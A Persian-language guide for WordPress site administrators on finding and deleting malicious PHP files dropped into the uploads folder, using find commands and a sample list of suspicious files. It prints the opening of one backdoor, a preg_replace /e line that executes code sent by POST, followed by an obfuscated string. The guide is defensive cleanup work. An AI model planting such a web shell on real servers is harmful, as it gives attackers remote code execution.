اگر شما دارای تعدادی زیادی وبسایت که با وردپرس ایجاده شده اند هستید، بارها ممکن است با این مشکل روبرو شده باشید، بطور کلی بیشتر این هکرهای عزیز به دنبال فولدر هایی می گردند که سطح درستی آنها ۷۷۷ می باشد، که در وردپرس رایج ترین مسیر /wp-content/uploads/ می باشد؛ بنابراین لازم است که به دنبال فایل های آپلود شده در این مسیر بر حسب تاریخ بگردیم، بدین منظور درshell دستور زیر را اجرا کنید :
۱ |
find ./public_html/wp-content/uploads/ -type f -name '*.php' -printf '%TY-%Tm-%Td %TT %p\n' | sort
|
به عنوان نمونه، نتیجه بررسی به صورت زیر می باشد:
۱
۲
۳
۴
۵
۶
۷
۸
۹
۱۰
۱۱
۱۲
۱۳
۱۴
۱۵
۱۶
۱۷
۱۸
۱۹
۲۰
۲۱
۲۲
۲۳
|
۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/۲۰۱۳/۰۵/blog84.php
۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/۲۰۱۴/۱۰/dump.php
۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/۲۰۱۴/code.php
۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/۲۰۱۵/۰۷/session90.php
۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/۲۰۱۵/۰۹/xml96.php
۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/۲۰۱۵/۵۰۴.php
۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/about_us.php
۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/contactus.php
۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/rtbwvcsxrnbsvcd.php
۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/sc_afsed.php
۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/team.php
۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/wp-upload.php
|
می توانید با دستور head خطوط اولیه این فایل ها را جهت بررسی محتوای آن مشاهده نمایید.
به عنوان مثال در فایل blog84.php بدین صورت می باشد:
۱
۲
۳
۴
۵
۶
|
head ./wp-content/uploads/۲۰۱۳/۰۵/blog84.php
<?php @preg_replace('/(.*)/e', @$_POST['dnrdztvetxn'], '');
$GLOBALS['af4569'] = "\x40\x46\x33\x2e\x62\x7a\x6e\x4c\xa\x7e\x28\x39\x59\x71\x54\x5f\x73\x65\x3f\x77\x5d\x29\x6c\x2f\x79\x50\x56\x63\x5c\x4f\x3c\x70\x2d\x34\x24\x4d\x4a\x53\x57\x67\x44\x51\x23\x43\x7d\x64\x2b\x72\x5
|
همانطور که مشاهده می نماید این فایل ها لازم است که سریع حذف شوند.
می توانید با دستور rm filename فایل مورد نظر (بعنوان مثال: blog84.php ) را حذف نمایید.
همچنین شما میتوانید از طریق دستور زیر، تمام سرور خود را برای پیدا کردن فایل های مخرب بررسی کنید
۱ |
find /home/*/domains/*/public_html/wp-content/uploads/ -type f -name '*.php' -printf '%TY-%Tm-%Td %TT %p\n' | sort
|
رعایت این موارد می تواند کمک زیادی برای جلوگیری از بلک لیست شدن آی پی میل سرور نماید.